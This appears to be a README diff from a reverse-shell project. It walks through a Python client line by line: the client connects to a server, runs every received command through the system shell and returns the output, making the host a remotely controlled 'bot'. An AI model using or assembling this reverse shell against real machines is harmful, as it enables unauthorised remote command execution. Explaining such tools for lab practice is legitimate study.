sammyutere/Reverse_shell_multiple_targets/README.md

 This creates an instance of the Server class, initializing it with the default host and port. server.run():

 This line calls the run method on the server instance.
 (Note: The run method needs to be defined in the Server class for this to work.
 It typically handles starting the server and accepting client connections.)

+**How creating the client works**

+The client.py script outlines how a client (or "bot" in the context of a reverse shell) connects to the server and handles incoming commands.

+def connect_to_server(host, port):: Defines a function that takes a host and port number to connect to the server.
+with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:: Creates a socket object using IPv4 addressing (AF_INET) and TCP (SOCK_STREAM), ensuring it's automatically closed after exiting the with block.
+sock.connect((host, port)): Initiates a connection to the server at the specified host and port.
+while True:: Enters an infinite loop to continuously listen for commands from the server.
+command = sock.recv(1024).decode('utf-8'): Waits to receive a command from the server, reading up to 1024 bytes.
+The received bytes are then decoded using UTF-8 to convert them back into a string.
+result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE): Executes the received command using the system shell. stdout=subprocess.PIPE and stderr=subprocess.PIPE capture the command's standard output and standard error, respectively.
+output = result.stdout.decode(sys.getfilesystemencoding()): Decodes the output of the command execution from bytes to a string using the file system's encoding, which ensures that characters specific to the system's file system are correctly interpreted.
+sock.send(output.encode('utf-8')): Sends the command execution result back to the server, encoding it to UTF-8 to convert the string back to bytes suitable for network transmission. time.sleep(1): Pauses execution for 1 second before listening for the next command.
+This is typically used to prevent the client from overwhelming the network or the server with rapid, continuous requests.
+This client script effectively transforms the machine it runs on into a "bot" that connects to a specified server, awaits commands, executes them, and returns the results.
+This setup is typical for controlled environments in cybersecurity practice, such as penetration testing labs, where researchers simulate attacks and defenses to better understand and improve security measures.